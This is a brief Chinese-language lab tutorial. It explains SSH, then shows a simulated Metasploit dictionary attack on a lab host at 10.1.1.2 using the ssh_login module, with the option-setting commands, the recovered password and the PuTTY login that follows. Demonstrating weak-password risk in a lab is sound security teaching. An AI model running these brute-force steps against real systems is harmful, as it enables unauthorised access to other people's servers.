介紹
SSH,Secure Shell 的縮寫,由 IETF 的網絡工作小組(Network Working Group)所制定;SSH 為建立在應用層和傳輸層基礎上的安全協議。SSH 是目前較可靠,專為遠程登錄會話和其他網絡服務提供安全性的協議。利用 SSH 協議可以有效防止遠程管理過程中的信息泄露問題.
SSH若有弱口令,則容易被挖礦程序等遠程登錄等等
下面模擬 msf對ssh弱口令的攻擊
目標主機IP : 10.1.1.2
使用metasploit對目標主機進行字典攻擊
使用的模塊為 auxiliary/scanner/ssh/ssh_login
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
輸入set RHOSTS 10.1.1.2設置SSH主機地址,
輸入set PASS_FILE c:\pass.txt設置字典文件
輸入set USERNAME root設置破解的帳號名
設置完成后輸入run命令運行字典攻擊
密碼 password
然后可以用 如PUTTY等工具鏈接 10.1.1.2
